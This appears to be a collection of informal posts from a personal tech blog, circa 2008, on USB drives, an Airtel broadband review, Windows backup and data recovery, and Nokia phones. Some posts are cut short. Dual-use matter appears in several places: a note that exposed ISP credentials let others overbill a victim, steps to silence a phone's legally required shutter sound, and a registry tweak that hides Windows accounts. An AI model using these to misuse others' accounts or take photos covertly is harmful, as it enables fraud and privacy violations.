2.PNY - PNY offers some excellent slim drives with good performance.I bought 4GB Micro Attache from Ebay,the drive stopped working the same day.I replaced it with a new drive the next day.The new pendrive was slightly different from the original.The Ebay pendrive was replaced by Fortune Marketing and the new pen drive was detected as 0 but had a serial no. in registry,the Ebay pendrive was detected as USBest USB2Flash Storage.The Ebay pendrive(navkarIT) was slow and the dimensions were misprinted as 30x12x21 mm in place of 30x12x2.1mm .Another difference that was visible on the new drive was different circuitry and the presence of two golden dots near the name PNY at the back side.Generally slim pendrives are very slow but the PNY drives offered better than acceptable performance and comes with a 5 year warranty .There are three slim drives available from PNY:-

Micro Attache - 30 x12 x 2.1mm (little bigger than a simcard)
Sliding Attache - 35 x 15 x 4mm , 50 x 15 x 4mm(open)

In contrast ,the Kingston Mini Slim has dimensions of 38.85 x 16.4 x 6.44 mm and comes with a warranty of 2yrs.Write speeds are good though.

1.You can partition the drives easily with lexar flip bit tool.More info available here.Lexar flip bit doesnt support all PD's.It works on Corsair,PNY but not on Kingston.

Recovering Partitions

Madatory:-Rs 500 installtion charges for wiring and Beetel ADSL modem or Rs 1500 for ADSL Wifi-Router(Beetel 450BX).If airtel is new in your colony and they are expanding their customer base,the installation might be completely free.

Optional Landline:-Rs 350 for Airtel Trend Landline Phone with SIM reader.Its optional to buy a LL unit from Airtel but the sales agent will insist that you buy them.This is an excellent phone the only problem is its display.After few months of usage the first few digits on the callerID will vanish.Another option is to go for a cordless phone CB53000 for Rs500.This is also a good phone for indian conditions with 2 AAA rechargable Ni-MH batteries on the cordless handset and a backup battery for the receiver unit !!! that is built in the charger.The units will be repaired free of cost as long as you keep the connection.BSNL offers a free CLID instrument with their connection.

-Extremely fast broadband installtion.Normally 1-3 days.They have separate departments for landline and braodband.Landline is installed first and broadband is installed the next day.Extermel

Positive Points :
-DL speeds were good,zero downntime.
-Speed of 27-30KBps during day for 256kbps connection.After 10.30pm the speed increases upto 60kBps(45-60).The night double speed is an unofficial Airtel offering and has been stopped from Aug 2008 in my city.
-Good quality landline phone given for under Rs.500.
-Zero rental for modem on most plans.
-Extremely responsive helpline.
-100 pulses free for DSL499 plan.
-Extremely professional and top-notch broadband installation and you dont have to feed the pockets of lineman.
-After using Airtel for a more than a year its only two times when i got less than advertised speeds.(underground sea cable problem).
-Plan change within 1-2 days.During holidays you can upgrade to higher speed plans and downgrade to the cheapest plan when you are not using the internet at all.Fair calcution of tariff when changing plans

Negative Points:

-Self imposed hello tune charges of Rs30.Hello Tune another first from Airtel is an old weaponry used to overcharge and harass its customers.
-Billing problems initially but all resolved under few hours.
-Very few payment centres in Lucknow.
-There is high probability that you wont recieve your first bill coz if you quit the connection in the first month then commission is deducted from sales agent salary.
-Cheque Bounce charge of Rs 200.
-LIES - When downgrading to a cheaper plan you may be told that the plan is "not available in your area"(by area they mean colony).Simply tell them to disconnect the broadband or downgrade the plan.
-LIES - Ownership of the modem is not made clear.BSNL charges monthly rent for modem or you can purchase the modem by paying an amount of Rs.1200 depending on the type of modem.In case of airtel you have to pay an installation charge of Rs500(or Rs1500 for Wi-Fi) but all plans are rent free.According to the call centre guys you have to submit the modem when disconnecting the connection.Smart tactics.

Airtel has extremely HIGH standards on in-house wiring,overhead wiring and everything related to your broadband.Few of my friends have switched from Reliance Broadnet to Airtel just because of wiring issues.. If you are going for Airtel then opt for an unlimited plan because i dont think airtel has a proper usage checking system set up.Go for the least speed BB plan available and then upgrade.

Security Issues:-
-Airtel uses your complete landline number with STD code as username and account number as PPPoE password.If you forgot to change your default modem password then anyone can log into your modem and know your phone number.The username and password can then be used by the hacker to overbill the victim.Most people opt for unlimited plans but speed on demand works as advertised.

-To change your speed you just need some other persons username and password.

-In most circles the PPPoE password can be changed by logging into the local airtel portal.Its twelve months Jan-Dec08 but i have not been able to change my password in UPE.The local airtel portal is down and if anyone knows your account number(printed on the bill) then he can use your account.Port binding was implemented in Lucknow on August 18,2008.There are many cities where port binding has not yet been implemented.

I would rate Airtel as the best ISP.I suggest you to keep Airtel if 50-100 bucks doesnt matter to you..If you are a web addict then another great option would be to take two connections, one from BSNL(Rs 500 upto 2mbps) and one from Airtel(UL plan)

Focus of the post:- Checklist before you format your widows PC.Here are things you need to remember before you format your Windows PC.Every now and then i come across people crying after a fresh windows install.For some of my friends a windows reinstall is a monthly job and for some who use computers as dvd players its a yearly job. It depends on how much you use your windows,the more you use it the more it wears out.

1. Firefox Data

All personal information including bookmards,passwords,browsing history,extensions,etc that needs to be backed up is placed in the firefox profile folder.Path of the profile folder:- "C:\Documents and Settings\Username\Application Data\Mozilla\Firefox\Profiles\profile folder" or simply goto Run and type "%appdata%/mozilla".Descriptions of all the files under the profile folder can be found here.

Bookmark Backup

1. Backup your Bookmarks manually in HTML(merge while restore) and JSON(replace while restore) formats

2. In Firefox 2 and lower versions bookmarks were stored in the file "bookmarks.html" located in the profile folder.In Firefox 3,bookmarks and browsing history are stored "places.sqlite" instead of bookmarks.html.

Backup your Complete Profile Folder located in C:\Documents and Settings\Profile Name\Application Data\Mozilla Firefox\Profile
Backup your History and Bookmarks by manually copying places.sqlite from the Firefox Profile Folder.Backup cookies by copying cookies.sqlite from the Firefox Profile Folder.
Backup the complete Extensions folder in profile folder to restore your extensions later on.
Backup username,passwords and never save exceptions stored in sigons3.txt(Encrypted) and key3.db(Encryption Key) or alternatively use Password Exporter Extension to restore username and passwords.signons3.txt is useless without key3.db.
You can also use Mozbackup(compatible with other Mozilla Products) or the FEBE extension(not the best option) to restore stuff.
Foxmarks extension can be used to synchronize bookmarks and passwords across different computers.Google browser sync was better but its dead.Comparison of browser synchronizers.

Personally i use the built-in Mozilla Profile Manager to create separate profiles in a safe location on the harddisk.Edit the firefox shortcut to "C:\Program Files\Mozilla Firefox 3\Firefox.exe" -p to activate Profile Manager.

2. BitTorrent Data and Settings

Settings and Resume Data - Backup up the entire contents of folder %AppData%/utorrent
.Torrent Files - Stored in %AppData%/utorrent by default or your custom folder set through Options>>Pref>>Directories>>Store .Torrents in or Move .torrents for finished jobs to:(for seeding)
Default Download Location - C:\Documents and Settings\Profile Name\My Documents\Downloads

Simply copy the entire contents of %AppData%\uTorrent into the same folder as utorrent.exe. Alternatively, create a blank file named settings.dat in the same folder as utorrent.exe, if you'd like to start out fresh (no settings/torrents). If using it in a multi-user environment, this folder should be accessible and writeable by all users so they can share settings and resume data.

3. Flashget

Save completed and uncompleted downloads(.jc!) from default location C:\Downloads.
Download and Resume - Settings for downloading and resuming later are saved in default.jcd database.Make sure you backup the database before reinstallion.

4.Google Desktop - In earlier GD versions default Index location was "C:\Documents and Settings\%USERNAME%\Local Settings\Application Data\Google\Google Desktop".The index location can be only be changed by editing the registry.In latest versions - Google Desktop 5.1+ the files are indexed in the partition with the most available free space.Google hasnt updated its GD help.

Exit GD and copy your index files to a safe location.
After reinstallation change registry keys as in the screenshot.

Suggest features for google desktop here and dont forget to click on Change Index Location under Improve control over indexing.

TweakGDS - TweakGDS is a useful GD plugin which allows you to change index location and include/exclude partitions for indexing.

5.GAME SAVED FILES - Most of the games create save files inside their installed directories but some of them spit save files outside their installed directories.

7. Rainlendar

Use the Backup and Restore feature to backup all your calendars and Rainlender files in zip format.Multiple calendars will be copied in the zip archive.This is similar to Google Calendars "Export My Calendar" feature.By default rainlender files are created in C:\Documents and Settings\ProfileName\.rainlendar2.The default calendar (default.ics) is created in the same folder.Change the location of the default calendar to a secure location on the harddisk.

Change the default calendar location and Backup all the calendars and settings using the backup option

Use the File>>Export feature to backup up all or a particular event and task.
If you are using multiple calendars (separate for office,personal,etc) then backup them indiviually in iCalendar format using the Export feature.

Can I install Rainlendar2 to a USB memory?

Yes, you can. If you use the Windows version the installer can do this automatically for you. You can also just copy everything in the Rainlendar's folder to the USB memory and create an empty text file called rainlendar2.ini in the same folder where the executable is. This will make Rainlendar2 to use it's own folder for the settings and it will also store all the events and tasks to the same folder too.

Where is all the data stored?

By default the settings files and the events/tasks are stored in a folder called .rainlendar2 inside your home folder. Symantec Definitions can be backed up with the help of Update Locator .The Update Locator finds Symantec virus definitions and copies them onto the Desktop into a folder called Update Locator Virus Definitions. This allows you to copy them to another location for use on another computer.

17.Backup Network (broadband) Settings - The windows way has been described here but the simplest way is to use the following commands:-

To backup your network settings:-

netsh interface dump > settings.txt

To restore your network settings:-

netsh exec settings.txt

This will backup everything(IP address,DNS servers,etc).The configuration file is made in c:\Documents and Settings\Username\filename.ext.Backup the file before a reinstall and restore it to the same location after a clean format before running the restore command.Very useful if you have to use the same settings on many computers.

Solutions to the above problem :-

1. Files and Settings Transfer Wizard - C:\windows\system32\usmt\migwiz.exe.(Start > All Programs > Accessories > System Tools ).You can choose to back up files and settings or only files/settings.Under the settings tab you can select :- Accessibilty,CMD Prompt Settings,Display Properties ,IE Settings,Network Printers and Drives,Windows Media Playar,Taskbar,etc. It is a convenient way to backup small settings.

2. Change Program Files Directory - By default all the programs are installed in C:\Program Files.You never know how many programs you will install so it is always recommended to change the default location of program files to a separate partition.Many programs continue to run after fresh windows reinstallation.I personally use a separate 12GB partition for Program Files.If you use multiple copies of Windows XP(for Gaming,Net,etc) then you can set a common Program Files Folder which will also save you the pain of installing essential applications across multiple copies of Windows XP and save disk space.

4.Changing Location of Documents and Settings Folder - Move your Documents and Settings folder from the default location to a safe place.If you get the access denied error while copying then skip "LoggedOnUserName\Application Data\Microsoft " folder.Make registry settings as described here, here or here(complete) .After making the necessary changes logoff and login again.

Typing "%UserProfile%" in run will now open the new location.In linux you can assign /home to a separate partition.

5.Make an Image of your Windows Partition - You can make an image of your windows partition after installing all the system drivers,tweaking,activation and essential softwares with Acronis True Image or Norton Ghost.When something goes wrong you can restore windows from the image.

Due to privacy laws in North-America , APAC and Gulf countires noisy N Series are sold which shouts at the pic when clicked.Even if privacy laws dont exist in your country there is good possiblity that you might be having a barking phone.In pre-symbian9 phones (eg:-N70,6600,6630) the shutter click could easily be silenced by putting warning tones off from the profiles section.

Earlier this thing was not possible but now several hacks have emerged which allow unrestricted access(no Signed Apps and no Certificate Error) to the phones internal memory and ROM.

Tested on hacked Nokia N73-5 RM-132 v4.0726.2.1.1 . I am not sure from where this hack originated but this is available on few of the forums.

Step1 : Open X-Plore and explore to "Z:\Private\10202be9\101F8809.txt" - Use Find feature

Step2 : Copy the file to C:\ or E:\ and edit the last line either in phone or on computer by opening in Notepad.

Beetel 220BX1 - New Firmware Disables USB

Focus of the post :- Updating the firmware of Beetel 220BX1 and Beetel 220BX will disable the USB connection port .

The new firmware for BX1 disables the USB port of the modem.The software version in FW3(Beetel 220BX1) and FW4(Beetel 110BX1) pics is exactly the same.This means the new firmware is meant for the newer model Beetel 110BX1 which has no USB port.

During service,the airtel engineer updated the firmware without my consent.When i asked him about the changes in the new firmware he replied that there is nothing new except the USB will be disabled.On asking further,he explained the USB caused frequent corruption of the modem settings.I told him to replace the modem with a new one.I destroyed my modem while downgrading the firmware.You wont be able to downgrade from v3.12L.The USB port is useful in connecting two systems to the internet without any hassles.

The firmware has minor changes and wont really effect the preformance.The logins http://192.168.1.1 and http://192.168.1.1/main.html has been integrated into one.Connect/Disconnect option in the modem page and a few other features.

Case I - Software Fault

One fine day i was just reading about NTFS partition in the OS Dinasaur book by Galvin[out of the 3 writers this is the easiest name to pronounce] for my endsem exams.I just read the line the cluster size[allocation unit] is configured when an NTFS partiton is formatted.I remembered the default cluster size was 4096 bytes,reading the book i decided to test what other cluster sizes are available."NTFS does not deal with individual sectors of a disk but instead uses clusters as the unit of disk allocation.A cluster is number of disk sectors that is a power of 2.The cluster size is configured when an NTFS file system is formatted.The default cluster size is the sector size for voulmes upto 512MB[that is 512bytes],1KB for volumes upto 1GB,2KB for voulmes upto 2GB, and 4KB for larger volumes.This cluster size is much smaller than that for the 16-bit FAT file system,and the small size reduces the amount of internal fragmentation."[OS Principles,find more here and here].Before you make some opinion about me i must tell you that i am 100% adept with partitions and partitioning.I had 3 primary partitions and 9 logical drives in the extended partition.The last two logical drives were empty for linux distros so i deleted the last drive.As soon as i clicked on "delete logical drive" the system just restarted.After the reboot i found that i had lost 3 logical drives,one of the lost logical drives had 213GB of data.The berserk WDM utility showed 1348GB of unallocated space more than the harddisk itself!!!.I cursed the Windows Disk Management utility, it reminded one of my friends talks,he used acronis disk director for partitioning and he lost one of his paritions in a similar way.I figured out the cause for this erratic behaviour - Never mix partitioning process with different utilites.This is a rare case and the whole data recovery process costed me at least 15marks but fortunately i got a short note question on NTFS in exams for 5 marks.I tested many data reovery utilites to recover 100% (213 GB of data).This isnt a detailed review of recovery softwares but contains a important word about each one of them.

Data recovery softwares have different modes depending on how you lost your data:-Format Recovery,Deleted Reovery(accidental file deletion),RAW Recovery(last resort),etc.Make sure you choose the correct one.

Ontrack Easy Recovery
I trusted this software the most.Initially the soft didnt recognize the filenames and folder structure.But after i converted the unallocated space into NTFS volume it recognized the data and folder structure(i didnt format it).Formatting the unallocated space would have made the data recovery more difficult.After going to Advanced Data Recovery>>Select Partition>>Advanced Options:-Select partition type(NTFS),Advanced Scan,>>Select Use MFT if you havent formatted the partition.Specifying this info the software immediately recognized my old NTFS volume.The software reovered 80% of my data.The software failed to recover saved web pages that were recoverd by file scavenger.

PC-Inspector file Recovery
Good old freeware with dirty Interface.Few audio and video files were corrupted while recovering!!.But the same files were recovered correctly by File Scavenger.The software did recover gigs of webpages but most of them were corrupted.Dont forget to spend a little time with the software interface.

File Scavenger v3.2
File Scavenger is an expert with NTFS partitions.It recovered 5gigs of documents and web pages which Ontrack and PC Inspector failed to recover.Except file scavenger no other utility was able to recover 100% of my data.It can recover data from even RAID arrays.

R-Studio
Lost file names and folder structure.Poor performance.

Acronis Recovery Expert bundled with Disk Director Suite
Initially i was looking for a utility that could undelete a partition but Active@ Partition Recovery just failed to work.I tested Acronis at last and laughed on myself.One click and everything was restored back to normal!!!.The partition was undeleted in just one click.I verified the integrity of files and everything was untouched.What a fool i have been all this time testing the capabilites of the recovery softwares.

Here are few utilites that failed to recover a single BIT of data
Active @ Partition Recovery
0&0 Disk Recovery v4.1 and bunch of other lesser known utils downloaded from the internet

Lessons learnt:-
Backup your data regularly.
~~Never~~Avoid mixing partitioning process with different utilites like Acronis Disk Director,Partiton Magic and Windows Disk Management.
Pack your PC during exams.

Do's and Donts in case you loose a partition

Try to recover the partition with data recovery softwares that can undelete a partiton.Most of the data recovery softwares lack this mode so go for a dedicated one like Acronis Recovery Expert or DiskInternals Partition Recovery.This will save you the pain of scanning the whole file system and saving individual files.
Never format the partiton with a different or same file system in case you have a damaged file system or corrupt partition table
If the data recovery software doesnt pick up your lost drive then try to allocate the unallocated space and dont forget to check the "Do not format this partition" tab.

Case II - Some HDD fault

If you broke your IDE HDD's pin or managed to burn your HDD's DMA chip then HDD will be detected in BIOS but Windows wont load(you wont be able to reinstall either).I came across two hard disks of such fault.One of which was my own Seagate 7200.7 80GB IDE HDD[3 years ago] with broken pin and another was a SATA WD 250GB disk given to me by bro's friend for data reovery[20 days back].Initially it looked to me some OS DMA fault or virus work but the problem was with HDD itself. I tried Acronis bootable DD CD,Hitachi's DFT,Seagate SeaTool,reinstalling windows but you will get an error everywhere.I wasnt surprised on the Linux Boot as i recovered by data three years back with a KNOPPIX Live CD.This time i used Ubuntu.If you have the faulty drive installed,Windows wont even load from a working drive with the working HDD installed as primary!.Linux will take a long time to boot and even a 1GB file will take hours to copy.
Lesson learnt:- Never loose hope.

Case III - Human Fault

I remember i was struck with a data disaster 6 years ago when i was new with computers.At that time i was resizing my 12Gb partition to 15GB[secnodary partition] with Partition Magic,frustated by the long process i just pressed the reset button.Windows ME on the primary partition worked fine.Each bit of data was precious to me in the dialup age.I used a utility called Drive Rescue by Alexander Grau to to recover the data .Its discontinued and it had the same interface as the new PC Inspector File Recovery by Convar.
Lessons learnt:-Always be patient.

I had a $150 budget for a mid-range graphics card.In India i was getting XFX 8600GT for $139(Rs 6000) so i told my friend to get a XFX 9600GT through his uncle in America.8800GT was out of budget for me and 9600GT filled the gap between 8800GT and 8600GTS so i emailed the newegg link for XFX 9600GT Extreme Edition which had the same price as standard edition.XFX gone mad with over 14 9600GT's in the lineup with Standard(650,1800)Extreme XT(680,1900),XXX(700,2000),XXX Alpha dog(740) Editions.Each of the models has its variants with difference in game bundle(Call of duty 4 or Company of Heroes),RAM and accessories.

-Standard model(4 variants) is available in plain 512MB,plain 512MB with CoH,with 1024MB DDR3 with either CoD4 or CoH;
-Extreme XT(2 variants) is available with CoH standard accessories,or with CoH better accessories bundle.
-XXX Edition(2 variants) is available with CoH,with CoD4
-XXX Alpha dog is available with either CoD4,CoH or Assasin's Creed...XFX confuses more with different model numbers for each

...but for my some reason my friend couldnt get a card through newegg and i ended up with a PNY 9600GT.So lets take a look at it......and i got lucky

The cooling is just average when compared to other 9600GT's.Its all aluminium and uses a Chiefly Choice fan CC6010S12H(Chiefly Choice+W*L*H+S for sleeve bearing+12V+H for HighSpeed) with 4000RPM speed and 15.15CFM air flow.The card uses a reference cooler and its idle temp is around 44C.

~~Memory Chips~~

~~The Samsung chips are rated for 1Ghz and easily overclocks to the rated frequencies.There is no cooling on the memory chips so dont expect it to overclock further .~~

Warranty for America:XFX offers the best warranty options while PNY offers one year warranty which can be extended to three years if you register on their site.In India i wont be getting any warranty so i wont lend it to anyone

~~The USP of this card is its price.This card is one of the cheapest 9600GT's.~~
Average overclocking.Overclocked Speeds :- 725/1000 (Not final,if you want you can bring this to cons).Its completely idiotic to pay more for factory overclocked cards...you pay more for what you can do yourselves..plus the card's been already overclocked so it wont overclock that much.
~~There is no point in complaining the accessories bundle or the cooling part since its one of the most affordable 9600GTs.Entry level cards in this range from other brands offer the same bundle.~~
~~Attractive SLI option.~~

Cons

Limited warranty options when compared to XFX and game bundle.

EVGA 9600GTs and Palit 9600GT Sonic with HDMI and Displayport will be an attractive option too.

The hacked page of cinema-systemsindia.com,self proclaimed india's leading cinemagazine leads to a couple a silent trojan downloads.At the time of writing the post the trojans arent detected by any of the major antivirus firms except NOD32 (scan).AVG AV with its Link Scanner completely fails here. Internet Explorer users get completely owned but google and Firefox 3 users are warned about the malicious content on the page

Using an updated antivirus system isnt a sufficient solution for a windows desktop system,the most surprising thing is that all the trojans downloaded from the hacked url were not detected by any of the major av's(scan1). The inbuilt heuristic scanning is pretty useless.

Focus of the post :- If you have used other blogger themes you must have noticed that there are different colors for the blog title,Post title and text color.In tekka there is only one main color as Text color,if you change the text color all of the three color changes.A search on google for editing tekka went in vain.Here is the code to change individual colors.I havent used the old blogger but it looks like tekka is an old blogger theme.Hope this works for you.

Hide users from Welcome Screen

The administrator account is hidden by default and doesnt show up at the welcome screen.You can get the classic logon screen by pressing Clt-Alt-Del at the welcome screen.Make sure all users are logged off.Similar to the administrator account other accounts can be hidden by editing the registry.Go to run,type regedit and navigate to the following registry key to hide an account:-

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion \Winlogon\SpecialAccounts\UserList

Select an account name and change its dword value to 0 to make it hidden.You can unhide the administrator account by changing its dword value to 1.To greet users with a blank welcome screen, change the dword value of all account to 0.

Changing Password - Very often people leave blank administrator passwords,use this simple command to create an administrator password(even when you are logged on another admin account).This changes the administrator password even if a password has been created.You can batch the following command as we did before.

Deleting a account:-

You can also use "control userpasswords2" command to manage user accounts.Hidden accounts can be viewed from:--My Computer right click->Manage->User and Groups OR right clicking an exe file->Run as->Drop down in username

N73-5 RM-132 - No 3G WCDMA2100

Detail specs of N73[forum nokia]

I bought a Nokia N73(N73-5 to be exact) on 30th November 2007.After reading the manual i found that the handset didnt support 3G WCDMA 2100.I was shocked as i had switched from Nokia 6630 which supported 3G.Any information regarding this was not available on the Nokia website,magazines,texts and shopkeepers too.A search on the the internet revealed that N73-5 is also sold in Amercia where there are WCDMA 900 networks.Selling N73-5 in america makes sense because of diiferent cell frequencies used there.While most european countries have 3G WCDMA2100 and few Asian countries are on the verge of getting 3G networks.

I will call this fraud because of the following reasons:-

1.The model name N73-5 isnt self-explanatory.N95-3 is a better phone than N95-1 while N73-5 is a stripped down version of N73-1.

2.Nokia adverstised N73 as a 3G phone.100% of the mobiles with front camera are 3G.The front camera is meant for video calls(possible on 3G networks).Even phones like 6630,6233 and N91 had 3G which have no front camera.

3.Nokia can be sued in court for unfair trade practice as the consumers were not informed about the change in specs of the phone.Nokia N91 also had two versions->with and without 3G but this thing was clearly mentioned on the package.It was clearly written on the advertisement catalogues of N91-"Non 3G version also available".N91 was sold as N91 GSM and N91 WCDMA.

4.Nokia is selling 3G equipments to Airtel,BSNL..Few of the service providers have already tested 3G and will soon be launching 3G services on getting green signal from the government.

5.All music edition phones are N73-1 RM-133 while non music editions can either be N73-5 RM-132 or RM-133.

6.The only place the package was labelled N73-5 were two stickers (one with barcode and the other with Nokia address).Both the stickers are meant for dealers.

The firmware of N73-1 standard edition can be changed to that Music edition...but i dont think flashing N73-5 with N-73-1(if possible)will enable 3G!!! 3G reqiures special chip and it must be missing from N73-5.This was confirmed from NOKIA CARE:

By the email you sent me clearly means that N73-5 does not support WCDMA.But the feature link you sent me in the email mentions that N73(normal edition) supports WCDMA.Even on the NOKIA INDIA site there are two N73 edition namely N73 and N73 Music Edition,there is no phone like N73-5 on the site.This is an unfair trade practice and I have been fooled into buying a downgraded N73.

Connecting NFS Most Wanted and Underground 2 on LAN

Focus of the post:-Connecting NFS on LAN requires minor editing in the default settings.

After successfully connecting my friends laptop to my desktop through a crosswire cable,i was not able to create a server in LAN mode of NFS Most Wanted.Although everything was connected fine,file and printer sharing was enabled multiplayer mode repeatedly gave the message"Creating Server" and then ended.I had to manually edit the "server.cfg" file in the games folder to replace the old IP address with the IP Address of my system.

Monochrome Laser Printer Buyout

Buying an entry level monochrome laser printer was a tough job for me.I had four brands to choose from Samsung,HP,Xerox,Canon.Xerox printers are hard to get in computer market,they have a no frills 600dpi printer for around 4000Rs.I had to travel long distances to get a Xerox printer plus i wasnt sure about its service.They are distributed through esys.The second brand was HP,all the printers were overpriced when compared to Samsung and Canon.An entry level 600x600 dpi HP 1018 costs Rs5500 while a similar specs Samsung ML-1610 costs around Rs.4200.I was surprised at HP's prices because everywhere around you see HP laser printers in government office and in cybercafes too.The second brand out from my list was HP just coz of its insane prices.Samsung had three printers in its product lineup(the printers you can actually buy ,the rest are only available on the wild wild web):-ML-1610,ML-2010,ML-2571.The first two models were available in the computer market for Rs4200 and Rs5200 respectively.ML-2571 is a network printer and it seems that it is distributed through some other channels!!.ML -2010 (1200x600,1 yr onsite warranty) seemed to be quite convincing printer.I was looking for a decent laser printer with good value for money.Generally entry level laser printers are marketed on:-

speed (ranges from 15ppm-22ppm across models)
resolution(600x600,1200x600,1200x1200)
processor(150,400Mhz,etc)
RAM(8-32MB)
toner capacity(its equivalent of petrol tank in your bike and NOT EQUAL to petrol),
time taken to print the first page out

The only feature i was concerned about was resolution.You should be aware if the mentioned dpi is the true dpi or a interpolated one.Since i wanted it for homePC for text printouts speed,time and distance was not a priority for me.Ram and processor are just enough to handle the device so you need not pay attention to this.Another thing that samsung advertised was 1-yr onsite warranty and 3000 page toner capacity.I was impressed so i decided to buy a samsung printer very next day.

Final day:-Finally when i went out with money i found another new entrant in the printer arena - CANON.Canon hoardings were being placed all around the NASA Building and most big shopkeepers(shopkeepers who actually stock the item rather than buying it from other shops)replaced their old hoardings.This indicated that canon is giving a good product lineup,better margins for sellers and good service.Canon is the best manufacturer for inkjets,MFDs ,digicam.Initially i doubted canon's ability for lasers but soon i came to know that it manufactures laser assemblies's and other laser printer parts for other manufactures.Canon's 'laser shot' printers offered excellent features way ahead than SAMSUNG and HP.For my budget,i had two models to choose from the CLB-300(Rs.5500) and LBP-1210(Rs.5950).The LBP-1210 looks like a heavy duty printer.I have a liking for big and heavy things and this printer just got that.Its features were superb:- it has CAPT(Canon Advanced Printing Technology that makes use of PC's processor and RAM),USB+parallel connectivity,250 page paper tray,2400x600 dpi!!(600x600 true) and 0->warm->up->time,bi-directional print direction.The most striking thing i came to know about CANON laser's was that they came with full toner's.I was not aware of the fact that HPee and SAMSunk ship with dem0 cartridges.The are about 25-30% filled.Since i am a no printer expert,his thing i came to know from the dealers only and you should confirm this.Toner's cartridges cost about Rs2500 but they can be refilled for 2500/10=Rs250.The best thing is that i got 2-yrs on-site warranrty on the printer while the lighter model CLB-3000 ships with a lighter warranty of 1-year.The deal was finalised for Rs.5950.

Shortcomings:-The package was so big that it could not be carried on a two-wheeler.The power switch is difficult to reach on the backyard.The worst part is that the printer ships with no connectivity cable.You have to buy it separately from the market.You need a USB B-type cable that is different from normal USB cable.I used my Beetel ADSL 220Bx1 modems USB cable.The printer driver was easy to setup and didnt find any problems in installation.The whole setup took about 15mins.Also let me tell this printer is really big,really really big ,really really really big-388wx524dx254h mm.Therefore thIS printer is not made for OFFICE ENVOIRMENT.Overall,the printer offers an excellent value for money.

Warning/Advice:
-This is a really big printer,i would call it a half pregnant Samsung ML-2010.
-Refrain yourselfes from buying a HP even if they offer 3yr warranty with HP care pack with the packs costing as much as the new printer itself.
